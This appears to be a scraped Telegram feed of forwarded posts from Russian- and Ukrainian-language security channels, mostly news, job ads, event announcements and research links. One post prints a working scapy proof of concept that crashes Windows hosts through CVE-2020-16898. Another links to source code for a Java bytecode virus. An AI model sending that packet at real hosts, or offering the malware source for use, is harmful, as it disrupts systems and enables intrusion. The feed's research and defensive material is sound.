Forwarded from Deleted Account
860 GB курсов. https://mega.nz/folder/ipkzVbxY#YmRFYvZeKEHl9SHz-eRQsQ
mega.nz
File folder on MEGA
Forwarded from Order of Six Angles
Список .NET обфускаторов
https://github.com/NotPrab/.NET-Obfuscator
Список .NET деобфускаторов
https://github.com/NotPrab/.NET-Deobfuscator
https://github.com/NotPrab/.NET-Obfuscator
Список .NET деобфускаторов
https://github.com/NotPrab/.NET-Deobfuscator
Forwarded from Order of Six Angles
sscc-2017-vivek-pm.pdf
677.8 KB
ASLR and ROP Attack Mitigations for ARM-Based Android Devices
Forwarded from Order of Six Angles
First Steps in Hyper-V Research от @AmarSaar
https://msrc-blog.microsoft.com/2018/12/10/first-steps-in-hyper-v-research
https://msrc-blog.microsoft.com/2018/12/10/first-steps-in-hyper-v-research
Forwarded from 44.WAV-E
"Чувак, эта вечеринка отстой.
Я, бля, ненавижу этих людей." (с) Фанат
Есть целая категория игр которые ты играешь "спинным мозгом", на одних рефлексах
Рекомендую Dead Cells && Hotline Miami (1|2)
А сейчас - музыка!
12.00 - ukr music
13.30 - dubstep
15.00 - dnb
15.30 - rap
17.00 - syntwave
20.00 - dj stuff
22.00 - KICKASS SPECIAL
####### bit.ly/44WAVE ########
Я, бля, ненавижу этих людей." (с) Фанат
Есть целая категория игр которые ты играешь "спинным мозгом", на одних рефлексах
Рекомендую Dead Cells && Hotline Miami (1|2)
А сейчас - музыка!
12.00 - ukr music
13.30 - dubstep
15.00 - dnb
15.30 - rap
17.00 - syntwave
20.00 - dj stuff
22.00 - KICKASS SPECIAL
####### bit.ly/44WAVE ########
Forwarded from Alexandr 🔆
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from 🇺🇦x_Notes🇺🇦 🔜
🙂🙂
На mc.today вышла статья о мне и компании “Hacken”.
#hacken #pr #mctoday
https://mc.today/vzlamyvayu-adminki-na-zakaz-poluchayu-do-5-tys-kak-ya-stal-belym-hakerom/
На mc.today вышла статья о мне и компании “Hacken”.
#hacken #pr #mctoday
https://mc.today/vzlamyvayu-adminki-na-zakaz-poluchayu-do-5-tys-kak-ya-stal-belym-hakerom/
MC.today, Media for Creators
Взламываю «админки» на заказ, получаю до $5 тыс. Как я стал «белым хакером»
Сергей Харюк работает «белым хакером» в Hacken.io. Вместе с командой они имитируют атаки киберпреступников. Так они выясняют, где в системах компаний слабые места и как их защитить.
Forwarded from TechMaker
Вже скоро у продажу наш сніфер для аналізу та реверсу CANbus автомобілів, мотоциклів, UAV та інших пристроїв.
Особливості:
- одночасний аналіз двох CAN шин через єдиний type-C usb.
- сумісний з усіма існуючими open-source інструментами, нативно підтримується ядром Linux.
- має вдосталь потужності для реалізації власних сценаріїв прямо в мізках сніфера
- інтегровані термінатори (резистори між CANH-CANL) CAN шини. Два перемикачі двозволяють підключити їх до двох шин окремо, у разі необхідності
Особливості:
- одночасний аналіз двох CAN шин через єдиний type-C usb.
- сумісний з усіма існуючими open-source інструментами, нативно підтримується ядром Linux.
- має вдосталь потужності для реалізації власних сценаріїв прямо в мізках сніфера
- інтегровані термінатори (резистори між CANH-CANL) CAN шини. Два перемикачі двозволяють підключити їх до двох шин окремо, у разі необхідності
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
http://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
http://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
Forwarded from Noise Security Bit (AM)
Найдено несколько уязвимостей в Jitsi Meet:
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
Forwarded from DC8044 F33d
В рубрике проверенных вакансий у нас сегодня агонь предложение. Молодая компания OCTAL уверенно пробивается в лидеры рынка пентеста и по фидбекам людей, которые в ней работают, является несомненным топчиком как работодатель по урвню организации процессов и комфорту работы. Присоединяйтесь к возможно лучшей сайберсек тиме в наших краях!
Check out this job at OCTAL: Penetration Tester https://www.linkedin.com/jobs/view/2240951441
Check out this job at OCTAL: Penetration Tester https://www.linkedin.com/jobs/view/2240951441
Linkedin
OCTAL hiring Penetration Tester in Kyiv, Kyiv City, Ukraine | LinkedIn
Posted 9:00:09 AM. Our work focuses on network, web, and mobile application security assessments with a diversified…See this and similar jobs on LinkedIn.
Forwarded from SecurityLab.ru (Pipiggi)
Мы часто слышим о том, что мир стоит на пороге технологической революции, которая изменит нашу жизнь к лучшему. Однако этого пока не произошло. Напротив, мы наблюдаем риски всеобщей цифровизации: вся жизнь современного общества построена вокруг технологий, а кибератаки могут поставить под удар нормальное функционирование городов или привести к настоящей техногенной катастрофе. Вариантом дальнейшего существования в таких условиях может стать предварительное моделирование угроз для критически важной инфраструктуры без последствий в реальном мире.
Речь идет о киберучениях – проведении контролируемых атак с целью проверки и улучшения навыков служб ИБ по обнаружению киберугроз и реагированию на них. Positive Technologies проводит опрос среди российских специалистов по информационной безопасности, чтобы выяснить, насколько востребованы российским бизнесом киберучения.
Пожалуйста ответьте на несколько вопросов: https://ru.research.net/r/MSB7VPS . Все данные будут использованы в обезличенном виде, а итоговый материал будет опубликован на сайте Positive Technologies.
Речь идет о киберучениях – проведении контролируемых атак с целью проверки и улучшения навыков служб ИБ по обнаружению киберугроз и реагированию на них. Positive Technologies проводит опрос среди российских специалистов по информационной безопасности, чтобы выяснить, насколько востребованы российским бизнесом киберучения.
Пожалуйста ответьте на несколько вопросов: https://ru.research.net/r/MSB7VPS . Все данные будут использованы в обезличенном виде, а итоговый материал будет опубликован на сайте Positive Technologies.
Forwarded from [Kryacked🐥] Cybersecurity hands-on
Telegraph
EY Cyber Consulting Bootcamp
Цікавишся ІТ і хочеш спробувати себе в ІТ-консалтингу? EY розпочинає унікальний проєкт EY Cyber Consulting Bootcamp😍 EY Cyber Consulting Bootcamp – це: ✔️П’ять тижнів інсайтів від консультантів напряму управління інформаційними технологіями та IT-ризиками…
Forwarded from Codeby
ASM – техники из старого сундука
Есть поговорка: "Программистами не рождаются – ими умирают". Исходя из этой парадигмы можно сделать вывод, что за долгий свой/программерский путь, у каждого из нас снежным комом накапливаются различные техники и алгоритмы, поделиться с общественностью которыми было-бы не грех. К примеру на этапе моего начинания, мир процессора для меня был так юн, что некоторые вещи не приобрели ещё свои имена и приходилось указывать на них пальцем. Позже, все просветления было решено записывать в блокнот, который постепенно разбух до увесистого романа. Фильтр элементарных заметок сделал своё дело и на данный момент в этом блокноте осталось ~1000 строк, которые я и решил сбросить сюда с краткими комментариями. Надеюсь у топика найдутся свои "евангелисты" и кто-нибудь почерпнёт с него что-то полезное.
Читать: https://codeby.net/threads/asm-texniki-iz-starogo-sunduka.75535/
#asm #cpuid #marylin
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Есть поговорка: "Программистами не рождаются – ими умирают". Исходя из этой парадигмы можно сделать вывод, что за долгий свой/программерский путь, у каждого из нас снежным комом накапливаются различные техники и алгоритмы, поделиться с общественностью которыми было-бы не грех. К примеру на этапе моего начинания, мир процессора для меня был так юн, что некоторые вещи не приобрели ещё свои имена и приходилось указывать на них пальцем. Позже, все просветления было решено записывать в блокнот, который постепенно разбух до увесистого романа. Фильтр элементарных заметок сделал своё дело и на данный момент в этом блокноте осталось ~1000 строк, которые я и решил сбросить сюда с краткими комментариями. Надеюсь у топика найдутся свои "евангелисты" и кто-нибудь почерпнёт с него что-то полезное.
Читать: https://codeby.net/threads/asm-texniki-iz-starogo-sunduka.75535/
#asm #cpuid #marylin
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Forwarded from road to OSCP
YouTube
005.Безопасность бинарных приложений" - Андрей Ковалев
Поговорим о безопасности компилируемых приложений. В частности, рассмотрим уязвимости, связанные с порчей памяти (out of bound, use after free, type confusion), а также компенсационные технические меры, которые применяются в современных компиляторах для снижения…
Forwarded from CTF в формате шоу (Nikita Sychev)
Организаторы VolgaCTF зовут всех на онлайн мастер-классы по линуксу, сетям и CTF для начинающих
1–8 ноября
Онлайн
Программа: https://t.me/volgactf/167
Регистрация: https://forms.gle/X6eFNkpY4QyNZUwq9
1–8 ноября
Онлайн
Программа: https://t.me/volgactf/167
Регистрация: https://forms.gle/X6eFNkpY4QyNZUwq9
Telegram
VolgaCTF
🤓Быть умным и много знать – хорошо и прибыльно. Мы тебе в этом поможем!
С 1 ноября команда движения волонтеров цифрового развития Самарской области запускает онлайн-лекции! Конечно, не без нашего участия.
Для кого: для всех, кто хочет в технологии, но…
С 1 ноября команда движения волонтеров цифрового развития Самарской области запускает онлайн-лекции! Конечно, не без нашего участия.
Для кого: для всех, кто хочет в технологии, но…
Forwarded from vx-underground
image_2020-11-01_14-59-33.png
21 KB
Мы представляем вам Cheshire от bot! Это первый полнофункциональный Java bytecode вирус, со времен вируса Strangebrew, выпущенного еще в 2001 году.
https://github.com/vxunderground/MalwareSourceCode/tree/main/Java/Virus.Java.Cheshire.a
https://github.com/vxunderground/MalwareSourceCode/tree/main/Java/Virus.Java.Cheshire.a
Forwarded from Russian OSINT
Киберкомандование США вместе с CISA и ФБР поздравляет российских государственных хакеров с Хеллоуином!
По заявлению Киберкомандования США, ими было обнаружило восемь новых образцов вредоносного ПО, которые разработаны и развернуты российскими хакерами в ходе недавних атак.
Шесть из восьми образцов относятся к вредоносному ПО ComRAT (используется хакерской группой Turla), а два других являются образцами вредоносного ПО Zebrocy (используется хакерской группой APT28).
Первые жертвы этих вредоносных программ выявлены в Восточной Европе и Центральной Азии.
По заявлению ZDnet, цель правительства США - поделиться последними версиями этих хакерских инструментов с широкой публикой, чтобы системные администраторы и другие защитники обновили меры защиты.
https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a
И обязательный атрибут в конце любой статьи про русских хакеров это медведь, жаль без водки и закуски!
По заявлению Киберкомандования США, ими было обнаружило восемь новых образцов вредоносного ПО, которые разработаны и развернуты российскими хакерами в ходе недавних атак.
Шесть из восьми образцов относятся к вредоносному ПО ComRAT (используется хакерской группой Turla), а два других являются образцами вредоносного ПО Zebrocy (используется хакерской группой APT28).
Первые жертвы этих вредоносных программ выявлены в Восточной Европе и Центральной Азии.
По заявлению ZDnet, цель правительства США - поделиться последними версиями этих хакерских инструментов с широкой публикой, чтобы системные администраторы и другие защитники обновили меры защиты.
https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a
И обязательный атрибут в конце любой статьи про русских хакеров это медведь, жаль без водки и закуски!
Forwarded from SecurityLab.ru (SecurityLab news)
В условиях массового перехода на удаленный режим работы 51% компаний в мире и 42% в России намерены расширить штат специалистов в области кибербезопасности. В связи с этим уже к следующему году компании могут столкнуться с дефицитом ИБ-специалистов. Об этом говорится в исследовании компании PwC.
https://www.securitylab.ru/news/513650.php
https://www.securitylab.ru/news/513650.php
t.me
К 2021 году из-за удаленки возникнет дефицит ИБ-специалистов по всему миру
В условиях пандемии COVID-19 многим организациям пришлось пересмотреть и переосмыслить стратегии обеспечения кибербезопасности.